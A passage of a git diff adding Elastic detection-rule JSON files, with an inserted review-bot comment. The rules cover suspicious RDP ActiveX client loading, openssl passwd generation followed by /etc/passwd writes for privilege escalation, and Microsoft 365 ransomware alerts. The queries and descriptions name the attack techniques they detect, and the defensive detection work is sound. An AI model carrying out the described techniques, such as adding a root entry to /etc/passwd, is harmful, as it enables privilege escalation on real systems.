}, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "71c5cb27-eca5-4151-bb47-64bc3f883270_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_109.json b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_109.json new file mode 100644 index 00000000000..074f5477b6b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_109.json 
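Review bot: The list of suspicious load locations in the query pins the drive letter (`"C:\\Windows\\*"`, `"C:\\Users\\Public\\*"`, `"C:\\ProgramData\\*"`, …) while the false-positive exclusions immediately below use the `?:` drive wildcard, so the two lists follow different conventions and a system directory on a non-C: system drive is never evaluated at all; using `?:` in both lists, or a short comment next to `/* depending on noise in your env add here extra paths */` stating that C: is deliberate, would make the intent explicit. The _109 hunk that follows repeats the query unchanged and only narrows the index pattern, so the same remark applies there.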
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious Image Loading of the Remote Desktop Services ActiveX Client (mstscax), this may indicate the presence of RDP lateral movement capability.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious RDP ActiveX Client Loaded", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : \"mstscax.dll\" or file.name : \"mstscax.dll\") and\n /* depending on noise in your env add here extra paths */\n process.executable : (\n \"C:\\\\Windows\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Users\\\\Default\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\ProgramData\\\\*\",\n \"\\\\Device\\\\Mup\\\\*\",\n \"\\\\\\\\*\"\n ) and\n /* add here FPs */\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\vmconnect.exe\",\n \"?:\\\\Windows\\\\System32\\\\WindowsSandboxClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\hvsirdpclient.exe\"\n )\n", + "references": [ + "https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { 
+ "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "71c5cb27-eca5-4151-bb47-64bc3f883270_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_1.json b/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_1.json new file mode 100644 index 00000000000..1f025268db2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_1.json 
@@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the generation of a passwd password entry via openssl, followed by a file write activity on the \"/etc/passwd\" file. The \"/etc/passwd\" file in Linux stores user account information, including usernames, user IDs, group IDs, home directories, and default shell paths. Attackers may exploit a misconfiguration in the \"/etc/passwd\" file permissions or other privileges to add a new entry to the \"/etc/passwd\" file with root permissions, and leverage this new user account to login as root.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Passwd File Event Action", + "query": "sequence by host.id, process.parent.pid with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name == \"openssl\" and process.args == \"passwd\" and user.id != \"0\"]\n [file where event.dataset == \"auditd_manager.auditd\" and host.os.type == \"linux\" and file.path == \"/etc/passwd\" and\n process.parent.pid != 1 and not auditd.data.a2 == \"80000\" and event.outcome == \"success\" and user.id != \"0\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "integration": "auditd", + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "71d6a53d-abbd-40df-afee-c21fff6aafb0", + "setup": "\nThis rule requires data coming in from Elastic Defend and Auditd Manager.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and 
receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /etc/passwd -p wa -k etcpasswd\"\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 1 + }, + "id": "71d6a53d-abbd-40df-afee-c21fff6aafb0_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_2.json b/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_2.json new file mode 100644 index 00000000000..03643ee1de9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_2.json 
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the generation of a passwd password entry via openssl, followed by a file write activity on the \"/etc/passwd\" file. The \"/etc/passwd\" file in Linux stores user account information, including usernames, user IDs, group IDs, home directories, and default shell paths. Attackers may exploit a misconfiguration in the \"/etc/passwd\" file permissions or other privileges to add a new entry to the \"/etc/passwd\" file with root permissions, and leverage this new user account to login as root.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Passwd File Event Action", + "query": "sequence by host.id, process.parent.pid with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name == \"openssl\" and process.args == \"passwd\" and user.id != \"0\"]\n [file where host.os.type == \"linux\" and file.path == \"/etc/passwd\" and process.parent.pid != 1 and\n not auditd.data.a2 == \"80000\" and event.outcome == \"success\" and user.id != \"0\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, 
+ "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "71d6a53d-abbd-40df-afee-c21fff6aafb0", + "setup": "\nThis rule requires data coming in from Elastic Defend and Auditd Manager.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and 
receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /etc/passwd -p wa -k etcpasswd\"\n\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "71d6a53d-abbd-40df-afee-c21fff6aafb0_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_3.json b/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_3.json new file mode 100644 index 00000000000..45282fb7501 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/71d6a53d-abbd-40df-afee-c21fff6aafb0_3.json 
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the generation of a passwd password entry via openssl, followed by a file write activity on the \"/etc/passwd\" file. The \"/etc/passwd\" file in Linux stores user account information, including usernames, user IDs, group IDs, home directories, and default shell paths. Attackers may exploit a misconfiguration in the \"/etc/passwd\" file permissions or other privileges to add a new entry to the \"/etc/passwd\" file with root permissions, and leverage this new user account to login as root.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Passwd File Event Action", + "query": "sequence by host.id, process.parent.pid with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name == \"openssl\" and process.args == \"passwd\" and user.id != \"0\"]\n [file where host.os.type == \"linux\" and file.path == \"/etc/passwd\" and process.parent.pid != 1 and\n not auditd.data.a2 == \"80000\" and event.outcome == \"success\" and user.id != \"0\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, 
+ "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "71d6a53d-abbd-40df-afee-c21fff6aafb0", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend and Auditd Manager.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and 
receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /etc/passwd -p wa -k etcpasswd\"\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 3 + }, + "id": "71d6a53d-abbd-40df-afee-c21fff6aafb0_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_103.json b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_103.json new file mode 100644 index 00000000000..37813249c8f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_103.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware.", + "false_positives": [ + "If Cloud App Security identifies, for example, a high rate of file uploads or file deletion activities it may represent an adverse encryption process." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Potential ransomware activity", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Potential ransomware activity\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "721999d0-7ab2-44bf-b328-6e63367b9b29", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + 
{ + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "721999d0-7ab2-44bf-b328-6e63367b9b29_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_105.json b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_105.json new file mode 100644 index 00000000000..3ea3b21d4d4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_105.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware.", + "false_positives": [ + "If Cloud App Security identifies, for example, a high rate of file uploads or file deletion activities it may represent an adverse encryption process." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Potential ransomware activity", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Potential ransomware activity\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "721999d0-7ab2-44bf-b328-6e63367b9b29", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + 
{ + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "721999d0-7ab2-44bf-b328-6e63367b9b29_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_206.json b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_206.json new file mode 100644 index 00000000000..eeb7ad95034 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_206.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware.", + "false_positives": [ + "If Cloud App Security identifies, for example, a high rate of file uploads or file deletion activities it may represent an adverse encryption process." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Potential ransomware activity", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Potential ransomware activity\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "721999d0-7ab2-44bf-b328-6e63367b9b29", + 